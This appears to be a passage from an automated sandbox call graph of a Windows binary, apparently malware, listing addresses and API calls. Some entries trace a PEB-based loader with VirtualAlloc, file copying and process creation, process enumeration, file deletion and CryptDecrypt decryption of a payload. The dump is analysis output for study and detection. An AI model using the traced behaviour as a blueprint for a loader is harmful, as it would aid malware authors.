131473 6c31d972 swprintf 131473->131441 131475 6c328a14 ___scrt_is_nonwritable_in_current_image 131474->131475 131493 6c31b571 EnterCriticalSection 131475->131493 131477 6c328a22 131494 6c328aac 131477->131494 131483 6c328ddd 131482->131483 131525 6c319f63 131483->131525 131486 6c31a593 131492 6c31a5bc LeaveCriticalSection __fread_nolock 131486->131492 131488->131451 131489->131465 131490->131465 131491->131465 131492->131465 131493->131477 131502 6c328acf 131494->131502 131495 6c328b27 131510 6c325708 131495->131510 131500 6c328b39 131506 6c328a2f 131500->131506 131520 6c324667 6 API calls std::_Lockit::_Lockit 131500->131520 131502->131495 131502->131506 131517 6c30e8cd EnterCriticalSection 131502->131517 131518 6c30e8e1 LeaveCriticalSection 131502->131518 131503 6c328b58 131521 6c30e8cd EnterCriticalSection 131503->131521 131507 6c328a68 131506->131507 131524 6c31b588 LeaveCriticalSection 131507->131524 131509 6c31a56a 131509->131459 131509->131460 131515 6c325715 _unexpected 131510->131515 131511 6c325740 RtlAllocateHeap 131513 6c325753 131511->131513 131511->131515 131512 6c325755 131523 6c30ea09 14 API calls _memcpy_s 131512->131523 131519 6c3223b7 14 API calls 2 library calls 131513->131519 131515->131511 131515->131512 131522 6c318beb EnterCriticalSection LeaveCriticalSection ___CxxFrameHandler 131515->131522 131517->131502 131518->131502 131519->131500 131520->131503 131521->131506 131522->131515 131523->131513 131524->131509 131526 6c319f82 131525->131526 131527 6c319f95 131526->131527 131534 6c319faa 131526->131534 131545 6c30ea09 14 API calls _memcpy_s 131527->131545 131529 6c319f9a 131546 6c31ae7c 29 API calls _memcpy_s 131529->131546 131531 6c319fa5 131531->131486 131542 6c331ae0 131531->131542 131533 6c31a17b 131551 6c31ae7c 29 API calls _memcpy_s 131533->131551 131540 6c31a0ca 131534->131540 131547 6c31bd6f 39 API calls _memcpy_s 131534->131547 131537 6c31a11a 131537->131540 131548 6c31bd6f 39 API calls _memcpy_s 131537->131548 131539 6c31a138 131539->131540 131549 6c31bd6f 39 API calls _memcpy_s 131539->131549 131540->131531 131550 6c30ea09 14 API calls _memcpy_s 131540->131550 131552 6c331e98 131542->131552 131545->131529 131546->131531 131547->131537 131548->131539 131549->131540 131550->131533 131551->131531 131553 6c331ea4 ___scrt_is_nonwritable_in_current_image 131552->131553 131554 6c331eab 131553->131554 131557 6c331ed6 131553->131557 131632 6c31a473 ___scrt_is_nonwritable_in_current_image 131631->131632 131633 6c31a479 131632->131633 131636 6c31a4bc 131632->131636 131654 6c31b025 29 API calls 2 library calls 131633->131654 131635 6c31a494 131635->131469 131642 6c30e8cd EnterCriticalSection 131636->131642 131638 6c31a4c8 131643 6c31a37b 131638->131643 131640 6c31a4de 131655 6c31a507 LeaveCriticalSection __fread_nolock 131640->131655 131642->131638 131644 6c31a3a1 131643->131644 131645 6c31a38e 131643->131645 131656 6c31a2a2 131644->131656 131645->131640 131647 6c31a3c4 131648 6c31a3df 131647->131648 131653 6c31a452 131647->131653 131669 6c31e66b 34 API calls 3 library calls 131647->131669 131660 6c31db69 131648->131660 131653->131640 131654->131635 131655->131635 131657 6c31a2b3 131656->131657 131659 6c31a30b 131656->131659 131657->131659 131670 6c328bae 31 API calls 2 library calls 131657->131670 131659->131647 131661 6c31db82 131660->131661 131665 6c31a3f2 131660->131665 131661->131665 131671 6c31a18d 131661->131671 131663 6c31db9e 131678 6c32aa56 131663->131678 131666 6c328bee 131665->131666 131723 6c328d4f 131666->131723 131669->131648 131670->131659 131672 6c31a199 131671->131672 131673 6c31a1ae 131671->131673 131689 6c30ea09 14 API calls _memcpy_s 131672->131689 131673->131663 131675 6c31a19e 131690 6c31ae7c 29 API calls _memcpy_s 131675->131690 131679 6c32aa62 ___scrt_is_nonwritable_in_current_image 131678->131679 131689->131675 131729 6c31a5d3 131723->131729 131730 6c31a5e0 131729->131730 131731 6c31a5f5 131729->131731 131732 6c30ea1c __dosmaperr 14 API calls 131730->131732 131734 6c30ea1c __dosmaperr 14 API calls 131731->131734 131736 6c31a61a 131731->131736 131743 6c31da1d ___scrt_is_nonwritable_in_current_image 131742->131743 131744 6c31da27 131743->131744 131745 6c31da4a 131743->131745 131768 6c31b025 29 API calls 2 library calls 131744->131768 131752 6c31da42 131745->131752 131753 6c30e8cd EnterCriticalSection 131745->131753 131748 6c31da68 131754 6c31d983 131748->131754 131750 6c31da75 131752->131473 131753->131748 131755 6c31d990 131754->131755 131756 6c31d9b3 131754->131756 131781 6c31b025 29 API calls 2 library calls 131755->131781 131758 6c31d9ab 131756->131758 131759 6c31db69 ___scrt_uninitialize_crt 64 API calls 131756->131759 131758->131750 131760 6c31d9cb 131759->131760 131768->131752 131781->131758 131808->131356 131809->131359 131810->131361 131813 6c1bafa9 131811->131813 131823 6c1bb0e6 131813->131823 131815 6c1b9824 131816 6c1b9882 131815->131816 131822 6c1b98bc 131815->131822 131834 6c1b9a82 131816->131834 131819 6c1b98a8 131819->131822 131842 6c31df60 131819->131842 131822->131321 131824 6c1bb14e 131823->131824 131825 6c1bb124 131823->131825 131829 6c1bb15d 131824->131829 131833 6c1b1dc2 39 API calls 131824->131833 131826 6c1b1f46 39 API calls 131825->131826 131827 6c1bafc5 131826->131827 131827->131321 131827->131815 131829->131827 131830 6c1b418c 68 API calls 131829->131830 131831 6c1bb1a0 131830->131831 131831->131827 131832 6c1b1f46 39 API calls 131831->131832 131832->131827 131833->131829 131835 6c1b9a8a 131834->131835 131836 6c1b9889 131834->131836 131835->131836 131856 6c31ec6d 69 API calls swprintf 131835->131856 131836->131819 131836->131822 131838 6c31a1ee 131836->131838 131839 6c31a201 swprintf 131838->131839 131840 6c31a467 67 API calls 131839->131840 131841 6c31a216 swprintf 131840->131841 131841->131819 131843 6c31df80 131842->131843 131844 6c31df6b 131842->131844 131846 6c31df88 131843->131846 131847 6c31df9d 131843->131847 131861 6c30ea09 14 API calls _memcpy_s 131844->131861 131863 6c30ea09 14 API calls _memcpy_s 131846->131863 131857 6c31e635 131847->131857 131849 6c31df70 131862 6c31ae7c 29 API calls _memcpy_s 131849->131862 131851 6c31df8d 131864 6c31ae7c 29 API calls _memcpy_s 131851->131864 131854 6c31df98 131854->131822 131855 6c31df7b 131855->131822 131856->131836 131858 6c31e649 swprintf 131857->131858 131865 6c31ebde 131858->131865 131860 6c31e655 swprintf 131860->131854 131861->131849 131862->131855 131863->131851 131864->131854 131866 6c31ebea ___scrt_is_nonwritable_in_current_image 131865->131866 131867 6c31ebf1 131866->131867 131868 6c31ec14 131866->131868 131891 6c31b025 29 API calls 2 library calls 131867->131891 131876 6c30e8cd EnterCriticalSection 131868->131876 131871 6c31ec22 131877 6c31ea3d 131871->131877 131872 6c31ec0a 131872->131860 131876->131871 131878 6c31ea74 131877->131878 131879 6c31ea4c 131877->131879 131881 6c31a18d __fread_nolock 29 API calls 131878->131881 131896 6c31b025 29 API calls 2 library calls 131879->131896 131882 6c31ea7d 131881->131882 131889 6c31ea67 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 131891->131872 131896->131889 131914 6c30b5a3 131915 6c30b5b1 131914->131915 131916 6c30b5ac 131914->131916 131920 6c30b498 131915->131920 131931 6c30b5c6 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 131916->131931 131922 6c30b4a4 ___scrt_is_nonwritable_in_current_image 131920->131922 131921 6c30b4b3 131922->131921 131923 6c30b4cd dllmain_raw 131922->131923 131928 6c30b4c8 __DllMainCRTStartup@12 131922->131928 131923->131921 131924 6c30b4e7 dllmain_crt_dispatch 131923->131924 131924->131921 131924->131928 131925 6c30b539 131925->131921 131926 6c30b542 dllmain_crt_dispatch 131925->131926 131926->131921 131927 6c30b555 dllmain_raw 131926->131927 131927->131921 131928->131925 131932 6c30b36c 114 API calls 4 library calls 131928->131932 131930 6c30b52e dllmain_raw 131930->131925 131931->131915 131932->131930 131933 6c1c8d0a 131938 6c2502c2 131933->131938 131944 6c24a432 131938->131944 131940 6c1c8d14 131941 6c1c9700 131940->131941 131966 6c1c9715 131941->131966 131945 6c24a43e __EH_prolog3 131944->131945 131952 6c1ec870 131945->131952 131947 6c24a476 131948 6c24a4b7 131947->131948 131949 6c24a47f GetProfileIntW GetProfileIntW 131947->131949 131963 6c1ec8e4 LeaveCriticalSection RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase 131948->131963 131949->131948 131951 6c24a4be Concurrency::details::ExternalContextBase::~ExternalContextBase 131951->131940 131953 6c1ec8de 131952->131953 131954 6c1ec87c 131952->131954 131965 6c1e0b00 RaiseException CallUnexpected 131953->131965 131956 6c1ec88a 131954->131956 131964 6c1ec908 InitializeCriticalSection 131954->131964 131959 6c1ec8cc EnterCriticalSection 131956->131959 131960 6c1ec89a EnterCriticalSection 131956->131960 131959->131947 131961 6c1ec8c4 LeaveCriticalSection 131960->131961 131962 6c1ec8b1 InitializeCriticalSection 131960->131962 131961->131959 131962->131961 131963->131951 131964->131956 131967 6c1c972b 131966->131967 131968 6c1c9724 131966->131968 131973 6c3192f7 32 API calls 131967->131973 131972 6c319368 32 API calls 131968->131972 131971 6c1c8d1e 131972->131971 131973->131971 131974 6c1b7902 131979 6c1b7910 std::ios_base::_Ios_base_dtor _strlen 131974->131979 131975 6c1b8810 131976 6c31ae8c ___CxxFrameHandler 29 API calls 131975->131976 131978 6c1b8815 131976->131978 131977 6c1b8829 132132 6c1b22c0 31 API calls 4 library calls 131977->132132 132130 6c1b22c0 31 API calls 4 library calls 131978->132130 131979->131975 131979->131977 131983 6c1b7a78 131979->131983 131984 6c1b7a83 131979->131984 131996 6c1b7a2a _memcpy_s 131979->131996 131982 6c1b8838 132133 6c1b22c0 31 API calls 4 library calls 131982->132133 132104 6c1b1ba0 31 API calls ___CxxFrameHandler 131983->132104 131985 6c1c95d7 ___CxxFrameHandler 16 API calls 131984->131985 131985->131996 131986 6c1b881a 132131 6c1b22c0 31 API calls 4 library calls 131986->132131 131990 6c1b8847 132134 6c1b22c0 31 API calls 4 library calls 131990->132134 131992 6c1b888d 132140 6c1b22c0 31 API calls 4 library calls 131992->132140 131993 6c1b8856 132135 6c1b22c0 31 API calls 4 library calls 131993->132135 131995 6c1b7b2f 132105 6c1b1ba0 31 API calls ___CxxFrameHandler 131995->132105 131996->131992 131996->131995 132004 6c1b87a3 131996->132004 132014 6c1b7b3f std::ios_base::_Ios_base_dtor _memcpy_s 131996->132014 131998 6c1b885b 132136 6c1b22c0 31 API calls 4 library calls 131998->132136 131999 6c1b889c 132141 6c1b22c0 31 API calls 4 library calls 131999->132141 132003 6c1b8860 132137 6c1b22c0 31 API calls 4 library calls 132003->132137 132008 6c1c95d7 ___CxxFrameHandler 16 API calls 132004->132008 132005 6c1b88ab 132142 6c1b22c0 31 API calls 4 library calls 132005->132142 132007 6c1b7c78 CopyFileA 132011 6c1b7c86 132007->132011 132021 6c1b7cc1 _strlen 132007->132021 132008->132014 132010 6c1b886f 132138 6c1b22c0 31 API calls 4 library calls 132010->132138 132106 6c1b1900 39 API calls _strlen 132011->132106 132012 6c1b88ba 132143 6c1b22c0 31 API calls 4 library calls 132012->132143 132014->131975 132014->132007 132017 6c1b88c9 132144 6c1b22c0 31 API calls 4 library calls 132017->132144 132018 6c1b887e 132139 6c1b22c0 31 API calls 4 library calls 132018->132139 132019 6c1b7c9f 132107 6c1ba75c 39 API calls 132019->132107 132021->131982 132026 6c1b7d4d 132021->132026 132027 6c1b7d42 132021->132027 132035 6c1b7cf4 _memcpy_s 132021->132035 132023 6c1b88d8 132145 6c1b22c0 31 API calls 4 library calls 132023->132145 132031 6c1c95d7 ___CxxFrameHandler 16 API calls 132026->132031 132109 6c1b1ba0 31 API calls ___CxxFrameHandler 132027->132109 132028 6c1b7cb8 132108 6c1b8b87 76 API calls 132028->132108 132029 6c1b88e7 132146 6c1b2572 31 API calls 3 library calls 132029->132146 132031->132035 132034 6c1b8902 132035->131999 132036 6c1b7dd1 132035->132036 132038 6c1b8725 132035->132038 132043 6c1b7de4 std::ios_base::_Ios_base_dtor _memcpy_s 132035->132043 132110 6c1b1ba0 31 API calls ___CxxFrameHandler 132036->132110 132040 6c1c95d7 ___CxxFrameHandler 16 API calls 132038->132040 132039 6c1b7f39 CopyFileA 132041 6c1b7f47 132039->132041 132045 6c1b7f82 _strlen 132039->132045 132040->132043 132111 6c1b1900 39 API calls _strlen 132041->132111 132043->131975 132043->132039 132044 6c1b7f60 132112 6c1ba75c 39 API calls 132044->132112 132045->131990 132047 6c1b804c 132045->132047 132048 6c1b8041 132045->132048 132053 6c1b7fe9 _memcpy_s 132045->132053 132051 6c1c95d7 ___CxxFrameHandler 16 API calls 132047->132051 132114 6c1b1ba0 31 API calls ___CxxFrameHandler 132048->132114 132049 6c1b7f79 132113 6c1b8b87 76 API calls 132049->132113 132051->132053 132053->132005 132054 6c1b80cc 132053->132054 132056 6c1b874e 132053->132056 132059 6c1b80dc std::ios_base::_Ios_base_dtor _memcpy_s 132053->132059 132115 6c1b1ba0 31 API calls ___CxxFrameHandler 132054->132115 132057 6c1c95d7 ___CxxFrameHandler 16 API calls 132056->132057 132057->132059 132058 6c1baab6 129 API calls 132061 6c1b8253 std::ios_base::_Ios_base_dtor 132058->132061 132059->131975 132059->132058 132060 6c1b82d7 CreateProcessA 132063 6c1b8663 132060->132063 132067 6c1b831b _strlen 132060->132067 132061->131975 132061->132060 132116 6c1bad72 76 API calls 132061->132116 132128 6c1b8e22 72 API calls std::ios_base::_Ios_base_dtor 132063->132128 132065 6c1b82b7 132117 6c1b8bb0 81 API calls 132065->132117 132067->132003 132072 6c1b839f 132067->132072 132073 6c1b8394 132067->132073 132080 6c1b8346 _memcpy_s 132067->132080 132068 6c1b82bf 132068->132060 132069 6c1b82c6 132068->132069 132118 6c1b6b9c OpenProcess CloseHandle 132069->132118 132071 6c1b866b std::ios_base::_Ios_base_dtor 132071->131975 132078 6c1b86dd std::ios_base::_Ios_base_dtor 132071->132078 132077 6c1c95d7 ___CxxFrameHandler 16 API calls 132072->132077 132119 6c1b1ba0 31 API calls ___CxxFrameHandler 132073->132119 132075 6c1b86f9 132077->132080 132129 6c1b8d9e 72 API calls std::ios_base::_Ios_base_dtor 132078->132129 132079 6c1b82cc 132079->132060 132079->132063 132080->132023 132081 6c1b8414 132080->132081 132083 6c1b8802 132080->132083 132084 6c1b8420 std::ios_base::_Ios_base_dtor _memcpy_s 132080->132084 132120 6c1b1ba0 31 API calls ___CxxFrameHandler 132081->132120 132086 6c1c95d7 ___CxxFrameHandler 16 API calls 132083->132086 132084->131975 132094 6c1ba106 132084->132094 132086->132084 132087 6c1b85d3 132087->131975 132088 6c1b8642 CloseHandle CloseHandle 132087->132088 132091 6c1b85fa std::ios_base::_Ios_base_dtor 132087->132091 132127 6c1b8d9e 72 API calls std::ios_base::_Ios_base_dtor 132088->132127 132091->132087 132121 6c1b8bea 76 API calls 132091->132121 132092 6c1b8637 132122 6c1b8b0c 132092->132122 132095 6c1ba138 132094->132095 132147 6c1ba26c 132095->132147 132098 6c1ba346 45 API calls 132099 6c1ba1d0 132098->132099 132100 6c1ba3ae 119 API calls 132099->132100 132101 6c1ba1ee 132100->132101 132102 6c1ba219 132101->132102 132103 6c1b1f46 39 API calls 132101->132103 132102->132087 132103->132102 132104->131996 132105->132014 132106->132019 132107->132028 132108->132021 132109->132035 132110->132043 132111->132044 132112->132049 132113->132045 132114->132053 132115->132059 132116->132065 132117->132068 132118->132079 132119->132080 132120->132084 132121->132092 132151 6c1b8f70 132122->132151 132125 6c1b8b43 132125->132088 132126 6c1b1f46 39 API calls 132126->132125 132127->132063 132128->132071 132129->132075 132130->131986 132131->131977 132132->131982 132133->131990 132134->131993 132135->131998 132136->132003 132137->132010 132138->132018 132139->131992 132140->131999 132141->132005 132142->132012 132143->132017 132144->132023 132145->132029 132146->132034 132148 6c1ba2a6 132147->132148 132149 6c1ba486 78 API calls 132148->132149 132150 6c1ba1a4 132149->132150 132150->132098 132152 6c1b8f82 132151->132152 132156 6c1b8b17 132151->132156 132153 6c1b9a82 69 API calls 132152->132153 132154 6c1b8fa7 132153->132154 132155 6c31d953 69 API calls 132154->132155 132155->132156 132156->132125 132156->132126 132157 3280032 132167 3280ae4 GetPEB 132157->132167 132160 3280ae4 GetPEB 132163 32802a7 132160->132163 132161 32804a6 GetNativeSystemInfo 132162 32804d3 VirtualAlloc 132161->132162 132165 3280a02 132161->132165 132164 32804ec 132162->132164 132163->132161 132163->132165 132169 10007813 132164->132169 132168 328029b 132167->132168 132168->132160 132170 10007823 132169->132170 132171 1000781e 132169->132171 132175 1000771d 132170->132175 132183 1000b54b GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 132171->132183 132174 10007831 132174->132165 132177 10007729 __fcloseall 132175->132177 132176 100077c6 __fcloseall 132176->132174 132177->132176 132181 10007776 132177->132181 132184 100075b9 132177->132184 132179 100077a6 132179->132176 132180 100075b9 __CRT_INIT@12 149 API calls 132179->132180 132180->132176 132181->132176 132181->132179 132182 100075b9 __CRT_INIT@12 149 API calls 132181->132182 132182->132179 132183->132170 132185 100075c5 __fcloseall 132184->132185 132186 10007647 132185->132186 132187 100075cd 132185->132187 132188 100076a8 132186->132188 132189 1000764d 132186->132189 132235 1000803b HeapCreate 132187->132235 132192 10007706 132188->132192 132193 100076ad 132188->132193 132195 1000766b 132189->132195 132202 100075d6 __fcloseall 132189->132202 132260 10008306 66 API calls _doexit 132189->132260 132191 100075d2 132191->132202 132254 10009ac6 86 API calls 4 library calls 132191->132254 132192->132202 132266 10009a58 79 API calls __freefls@4 132192->132266 132194 10009754 ___set_flsgetvalue 3 API calls 132193->132194 132197 100076b2 132194->132197 132200 1000767f 132195->132200 132261 1000b0e4 67 API calls _free 132195->132261 132203 10009fe4 __calloc_crt 66 API calls 132197->132203 132264 10007692 70 API calls __mtterm 132200->132264 132202->132181 132206 100076be 132203->132206 132204 100075e2 __RTC_Initialize 132207 100075e6 132204->132207 132213 100075f2 GetCommandLineA 132204->132213 132206->132202 132209 100076ca DecodePointer 132206->132209 132255 10008059 HeapDestroy 132207->132255 132208 10007675 132262 100097a5 70 API calls _free 132208->132262 132216 100076df 132209->132216 132212 100075eb 132212->132202 132236 1000b468 71 API calls 2 library calls 132213->132236 132214 1000767a 132263 10008059 HeapDestroy 132214->132263 132219 100076e3 132216->132219 132220 100076fa 132216->132220 132218 10007602 132237 1000ae9f 73 API calls __calloc_crt 132218->132237 132223 100097e2 __CRT_INIT@12 66 API calls 132219->132223 132265 10006e49 66 API calls 2 library calls 132220->132265 132225 100076ea GetCurrentThreadId 132223->132225 132224 1000760c 132226 10007610 132224->132226 132257 1000b3ad 95 API calls 3 library calls 132224->132257 132225->132202 132256 100097a5 70 API calls _free 132226->132256 132229 1000761c 132230 10007630 132229->132230 132238 1000b137 132229->132238 132230->132212 132259 1000b0e4 67 API calls _free 132230->132259 132235->132191 132236->132218 132237->132224 132239 1000b140 132238->132239 132242 1000b145 _strlen 132238->132242 132267 1000de61 94 API calls __setmbcp 132239->132267 132241 10009fe4 __calloc_crt 66 API calls 132247 1000b17a _strlen 132241->132247 132242->132241 132245 10007625 132242->132245 132243 1000b1c9 132269 10006e49 66 API calls 2 library calls 132243->132269 132245->132230 132258 10008119 77 API calls 4 library calls 132245->132258 132246 10009fe4 __calloc_crt 66 API calls 132246->132247 132247->132243 132247->132245 132247->132246 132248 1000b1ef 132247->132248 132251 1000b206 132247->132251 132268 10007f48 66 API calls __lseeki64 132247->132268 132270 10006e49 66 API calls 2 library calls 132248->132270 132271 100086b0 10 API calls __call_reportfault 132251->132271 132253 1000b212 132254->132204 132255->132212 132256->132207 132257->132229 132258->132230 132259->132226 132260->132195 132261->132208 132262->132214 132263->132200 132264->132202 132265->132202 132266->132202 132267->132242 132268->132247 132269->132245 132270->132245 132271->132253 132272 6c1eeb44 132273 6c1eeb4d 132272->132273 132274 6c1eeb5d 132272->132274 132303 6c1ee76d TlsAlloc InitializeCriticalSection RaiseException 132273->132303 132278 6c1eebaf 132274->132278 132284 6c1ee7ad EnterCriticalSection 132274->132284 132277 6c1eeb71 132277->132278 132279 6c1eeb77 132277->132279 132305 6c1e0b00 RaiseException CallUnexpected 132278->132305 132304 6c1eeaa6 EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 132279->132304 132283 6c1eeb83 Concurrency::details::ExternalContextBase::~ExternalContextBase 132285 6c1ee7d1 132284->132285 132288 6c1ee838 GlobalHandle 132285->132288 132289 6c1ee823 132285->132289 132294 6c1ee8e4 LeaveCriticalSection 132285->132294 132302 6c1ee881 _memcpy_s 132285->132302 132287 6c1ee8b1 LeaveCriticalSection 132287->132277 132291 6c1ee8cc 132288->132291 132292 6c1ee84b GlobalUnlock 132288->132292 132296 6c1ee82b GlobalAlloc 132289->132296 132291->132294 132295 6c1ee8d1 GlobalHandle 132291->132295 132297 6c1e0528 132292->132297 132306 6c1e0acc RaiseException CallUnexpected 132294->132306 132295->132294 132298 6c1ee8dd GlobalLock 132295->132298 132299 6c1ee86d 132296->132299 132300 6c1ee861 GlobalReAlloc 132297->132300 132298->132294 132299->132291 132301 6c1ee871 GlobalLock 132299->132301 132300->132299 132301->132294 132301->132302 132302->132287 132303->132274 132304->132283 132307 6c1c5a00 132318 6c1c5a43 std::ios_base::_Ios_base_dtor _memcpy_s _strlen 132307->132318 132308 6c1c5b59 _strlen 132312 6c1c5b86 132308->132312 132385 6c1b22c0 31 API calls 4 library calls 132308->132385 132311 6c1c95d7 ___CxxFrameHandler 16 API calls 132311->132318 132314 6c1c5bd5 132312->132314 132315 6c1c5bc6 132312->132315 132320 6c1c5b8d _memcpy_s 132312->132320 132317 6c1c95d7 ___CxxFrameHandler 16 API calls 132314->132317 132386 6c1b1ba0 31 API calls ___CxxFrameHandler 132315->132386 132317->132320 132318->132308 132318->132311 132319 6c1c5b27 Sleep 132318->132319 132322 6c1c5c67 132318->132322 132329 6c1c5103 CreateToolhelp32Snapshot 132318->132329 132384 6c1b1ba0 31 API calls ___CxxFrameHandler 132318->132384 132319->132318 132387 6c1c52e6 33 API calls 4 library calls 132320->132387 132323 6c31ae8c ___CxxFrameHandler 29 API calls 132322->132323 132325 6c1c5c6c 132323->132325 132324 6c1c5c12 132324->132322 132326 6c1c5c41 std::ios_base::_Ios_base_dtor 132324->132326 132388 6c1b2572 31 API calls 3 library calls 132325->132388 132328 6c1c5c7b 132330 6c1c511f _memcpy_s 132329->132330 132331 6c1c52c2 132329->132331 132332 6c1c5135 Process32FirstW 132330->132332 132331->132318 132333 6c1c52bb CloseHandle 132332->132333 132354 6c1c5155 std::ios_base::_Ios_base_dtor _memcpy_s _strlen 132332->132354 132333->132331 132334 6c1c515e WideCharToMultiByte 132334->132354 132335 6c1c52dc 132390 6c1b22c0 31 API calls 4 library calls 132335->132390 132337 6c1c52e1 132338 6c31ae8c ___CxxFrameHandler 29 API calls 132337->132338 132340 6c1c52e6 SHGetFolderPathA 132338->132340 132342 6c1c58f9 132340->132342 132344 6c1c533b _strlen 132340->132344 132341 6c1c95d7 ___CxxFrameHandler 16 API calls 132341->132354 132342->132318 132343 6c1c599b 132395 6c1b22c0 31 API calls 4 library calls 132343->132395 132344->132343 132348 6c1c53ae 132344->132348 132349 6c1c53a6 132344->132349 132360 6c1c5362 _memcpy_s 132344->132360 132345 6c1c52cf CloseHandle 132345->132331 132346 6c1c52a1 Process32NextW 132346->132333 132346->132334 132352 6c1c95d7 ___CxxFrameHandler 16 API calls 132348->132352 132391 6c1b1ba0 31 API calls ___CxxFrameHandler 132349->132391 132350 6c1c59a0 132396 6c1b22c0 31 API calls 4 library calls 132350->132396 132352->132360 132354->132334 132354->132335 132354->132337 132354->132341 132354->132345 132354->132346 132389 6c1b1ba0 31 API calls ___CxxFrameHandler 132354->132389 132355 6c1c59ac 132397 6c1b22c0 31 API calls 4 library calls 132355->132397 132357 6c1c59b8 132398 6c1b22c0 31 API calls 4 library calls 132357->132398 132358 6c1c5404 132392 6c1b1ba0 31 API calls ___CxxFrameHandler 132358->132392 132360->132350 132360->132358 132364 6c1c5960 132360->132364 132369 6c1c540d std::ios_base::_Ios_base_dtor _memcpy_s 132360->132369 132361 6c1c59c4 132399 6c1b2572 31 API calls 3 library calls 132361->132399 132366 6c1c95d7 ___CxxFrameHandler 16 API calls 132364->132366 132365 6c1c59d3 132365->132318 132366->132369 132367 6c1c5595 132393 6c1b1ba0 31 API calls ___CxxFrameHandler 132367->132393 132369->132355 132369->132367 132370 6c1c5996 132369->132370 132371 6c1c5944 132369->132371 132377 6c1c55a2 std::ios_base::_Ios_base_dtor _memcpy_s 132369->132377 132372 6c31ae8c ___CxxFrameHandler 29 API calls 132370->132372 132373 6c1c95d7 ___CxxFrameHandler 16 API calls 132371->132373 132372->132343 132373->132377 132374 6c1c573a 132394 6c1b1ba0 31 API calls ___CxxFrameHandler 132374->132394 132376 6c1c5985 132378 6c1c95d7 ___CxxFrameHandler 16 API calls 132376->132378 132377->132357 132377->132370 132377->132374 132377->132376 132382 6c1c574a std::ios_base::_Ios_base_dtor _memcpy_s 132377->132382 132378->132382 132379 6c1c5889 std::ios_base::_Ios_base_dtor 132380 6c1c58ae DeleteFileA 132379->132380 132379->132382 132380->132342 132381 6c1c58bd 132380->132381 132381->132370 132383 6c1c58e8 std::ios_base::_Ios_base_dtor 132381->132383 132382->132370 132382->132379 132383->132342 132384->132318 132385->132308 132386->132320 132387->132324 132388->132328 132389->132354 132390->132337 132391->132360 132392->132369 132393->132377 132394->132382 132395->132350 132396->132355 132397->132357 132398->132361 132399->132365 132400 1001f0df 132407 10002c60 WSAStartup CreateEventW InterlockedExchange 132400->132407 132403 1001f0e4 132404 1001f7db 132403->132404 132410 10006f17 132403->132410 132422 10005a20 CreateEventW 132404->132422 132408 10006815 __cftoe_l 5 API calls 132407->132408 132409 10002cff 132408->132409 132409->132403 132412 10006f21 132410->132412 132411 10006e83 _malloc 66 API calls 132411->132412 132412->132411 132413 10006f3b 132412->132413 132417 10006f3d std::exception::exception 132412->132417 132450 10008550 DecodePointer 132412->132450 132413->132403 132415 10006f7b 132452 10006e24 66 API calls std::exception::operator= 132415->132452 132417->132415 132451 100073e9 76 API calls __cinit 132417->132451 132418 10006f85 132453 10007836 RaiseException 132418->132453 132421 10006f96 132423 10005a83 132422->132423 132424 10005a79 132422->132424 132454 10006410 HeapCreate 132423->132454 132460 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 132424->132460 132428 10005b12 132461 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 132428->132461 132429 10005b1c CreateEventW 132431 10005b55 132429->132431 132432 10005b5f CreateEventW 132429->132432 132462 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 132431->132462 132434 10005b84 CreateEventW 132432->132434 132435 10005b7a 132432->132435 132437 10005ba9 InitializeCriticalSectionAndSpinCount 132434->132437 132438 10005b9f 132434->132438 132463 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 132435->132463 132440 10005c77 InitializeCriticalSectionAndSpinCount 132437->132440 132441 10005c6d 132437->132441 132464 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 132438->132464 132443 10005c98 InterlockedExchange timeGetTime CreateEventW CreateEventW 132440->132443 132444 10005c8e 132440->132444 132465 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 132441->132465 132446 100067ff 77 API calls 132443->132446 132466 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 132444->132466 132447 10005d2b 132446->132447 132448 100067ff 77 API calls 132447->132448 132449 10005d3b 132448->132449 132450->132412 132451->132415 132452->132418 132453->132421 132455 10006441 132454->132455 132456 10006437 132454->132456 132459 10005af2 InitializeCriticalSectionAndSpinCount 132455->132459 132468 10006e49 66 API calls 2 library calls 132455->132468 132467 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 132456->132467 132459->132428 132459->132429 132460->132423 132461->132429 132462->132432 132463->132434 132464->132437 132465->132440 132466->132443 132467->132455 132468->132459 132469 100032e0 6 API calls 132470 6c1c4efe 132478 6c1b5dcb 132470->132478 132472 6c1c4f61 std::ios_base::_Ios_base_dtor 132473 6c1c5004 std::ios_base::_Ios_base_dtor 132472->132473 132474 6c31ae8c ___CxxFrameHandler 29 API calls 132472->132474 132475 6c1c502b 132474->132475 132532 6c1b2572 31 API calls 3 library calls 132475->132532 132477 6c1c503a 132533 6c1b556c 132478->132533 132480 6c1b5e08 132485 6c1b5e49 _memcpy_s 132480->132485 132555 6c1b68a0 56 API calls 3 library calls 132480->132555 132482 6c1b5e9c CryptAcquireContextW 132483 6c1b5ec8 CryptImportKey 132482->132483 132484 6c1b62dd 132482->132484 132486 6c1b632b CryptReleaseContext 132483->132486 132487 6c1b5f0c CryptSetKeyParam 132483->132487 132559 6c30bcce 30 API calls ___std_exception_copy 132484->132559 132485->132482 132561 6c30bcce 30 API calls ___std_exception_copy 132486->132561 132489 6c1b637e CryptDestroyKey CryptReleaseContext 132487->132489 132490 6c1b5f24 CryptSetKeyParam 132487->132490 132563 6c30bcce 30 API calls ___std_exception_copy 132489->132563 132493 6c1b63dc CryptDestroyKey CryptReleaseContext 132490->132493 132494 6c1b5f43 132490->132494 132491 6c1b6308 132560 6c30b6f1 RaiseException 132491->132560 132565 6c30bcce 30 API calls ___std_exception_copy 132493->132565 132499 6c1b5fb0 CryptDecrypt CryptDestroyKey CryptReleaseContext 132494->132499 132508 6c1b5f7f 132494->132508 132509 6c1b5f74 132494->132509 132516 6c1b6490 132494->132516 132496 6c1b635b 132562 6c30b6f1 RaiseException 132496->132562 132504 6c1b6437 132499->132504 132514 6c1b5fe4 132499->132514 132500 6c1b6323 132569 